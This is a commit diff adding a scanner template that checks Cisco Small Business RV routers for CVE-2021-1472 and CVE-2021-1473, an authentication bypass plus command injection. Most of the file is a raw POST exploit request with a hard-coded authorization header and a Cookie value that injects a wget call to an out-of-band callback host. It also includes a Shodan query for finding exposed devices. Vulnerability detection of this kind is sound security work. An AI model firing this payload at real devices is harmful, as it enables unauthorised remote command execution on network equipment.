Merge pull request #4461 from gy741/rule-add-v113

Create cisco-rv-series-rce.yaml
2022-07-18 20:52:16 +05:30 · 2022-07-18 20:52:16 +05:30 · b7b317dc02
parent c4ccd333d0 099e9ede6e
commit b7b317dc02
1 changed files with 71 additions and 0 deletions
--- a/vulnerabilities/other/cisco-rv-series-rce.yaml
+++ b/vulnerabilities/other/cisco-rv-series-rce.yaml
@ -0,0 +1,71 @@
+id: cisco-rv-series-rce
+
+info:
+  name: Cisco Small Business RV Series - Authentication Bypass and Command Injection
+  author: gy741
+  severity: critical
+  description: |
+    Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote
+    attacker could execute arbitrary commands or bypass authentication and upload files on an affected device.
+  reference:
+    - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
+    - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-1472
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-1473
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 9.8
+    cve-id: CVE-2021-1472,CVE-2021-1473
+    cwe-id: CWE-119
+  metadata:
+    verified: true
+    shodan-query: http.html:"Cisco rv340"
+  tags: cve,cve2021,cisco,rce,auth-bypass,injection
+
+requests:
+  - raw:
+      - |
+        POST /upload HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: sessionid='`wget http://{{interactsh-url}}`'
+        Authorization: QUt6NkpTeTE6dmk4cW8=
+        Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536
+
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="option"
+
+        5NW9Cw1J
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="destination"
+
+        J0I5k131j2Ku
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="file.path"
+
+        EKsmqqg0
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="file"; filename="config.xml"
+        Content-Type: application/xml
+
+        qJ57CM9
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="filename"
+
+        JbYXJR74n.xml
+        -----------------------------392306610282184777655655237536
+        Content-Disposition: form-data; name="GXbLINHYkFI"
+
+        <input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
+        -----------------------------392306610282184777655655237536--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - http
+
+      - type: word
+        part: body
+        words:
+          - '"jsonrpc":'